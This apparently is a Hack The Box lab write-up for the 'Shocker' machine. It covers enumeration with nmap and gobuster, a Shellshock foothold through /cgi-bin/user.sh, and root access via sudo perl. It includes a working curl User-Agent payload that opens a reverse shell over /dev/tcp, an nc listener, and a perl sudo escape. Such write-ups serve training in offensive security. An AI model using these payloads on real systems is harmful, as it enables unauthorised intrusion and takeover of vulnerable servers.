HTB - Shocker

Linux | Shellshock

Tools For This Room

  • Shellshock - Vulnerability - exploits Bash's tendency to execute trailing commands when importing a function definition stored into an environment variable - OWASP presentation

TL;DR / Executive Summary

  1. Scan and enumerate with nmap and gobuster

  2. Gain foothold with Shellshock and /cgi-bin/

  3. Privesc by exploiting perl as sudo

Scanning & Enumeration

We kick it off with our favorite nmap and gobuster scans

  • nmap 

nmap -sV -sC -vv <IP>

These ports are open to us: 80: HTTP 2222: SSH

Browsing to port80 gives us this page:

Downloading and running steghide on the .jpg doesn't yield anything.

  • gobuster

gobuster dir -u http://<IP> -w <wordlist>

Using the common.txt wordlist, we get the following results:

Most of the results are pretty standard, but the /cgi-bin/ directory is unusual. Let's check it out. Do note the "/" at the end of /cgi-bin/.

Unfortunately, we are met with a Forbidden error message.

Since we've explored the webpage, and there does not appear to be another avenue, let's find out more about /cgi-bin/.

A CGI-bin is a folder used to house scripts that will interact with a Web browser to provide functionality for a Web page or website. - Techopedia

Now that we know it's a folder which contains scripts, let's try to see if we can enumerate any scripts from it. We'll use gobuster with the -x flag for common script types.

gobuster dir -u http://<IP>/cgi-bin/ -w <wordlist> -x php,sh,py,rb

We quickly get a hit on /user.sh

Browsing to it starts a download of the user.sh script. We open it to find:

Gaining Foothold

At this point, we know there's a script in the /cgi-bin/ folder, but we need to find a way to use it to get a reverse shell. Turning to trusty Google, we get results with the vulnerability called "Shellshock", which aligns with the name of the room.

Digging into what the Shellshock vulnerability is:

"Shellshock is a security bug causing Bash to execute commands from environment variables unintentionally." - Netsparker

Additionally, the second Google result gives us a way to exploit this to get a reverse shell. Firs we get our netcat listener up and running:

nc -lvnp 4444

Now to execute and get our shell.

curl -A "() { :; }; /bin/bash -i > /dev/tcp/<ourIP>/4444 0<&1 2>&1" http://<victimIP>/cgi-bin/user.sh

We have a winner! We've gotten a shell:

After a bit of poking around, we find the user.txt:

Privilege Escalation

We run the usual gamut of simple privesc checks such as history, SUID, etc. But none of them yield anything useful.

Let's try to see what commands we can run as sudo, using "sudo -l".

Nice. Looks like we can run perl as sudo. Now to hop over to GTFObins to see how we can use this to escalate our privileges. We get the following command:

sudo perl -e 'exec "/bin/sh";'

Running this on our shell grants us root!

Finally, let's claim our flag:

PreviousHTB - LameNextHTB - Bashed

Last updated

Was this helpful?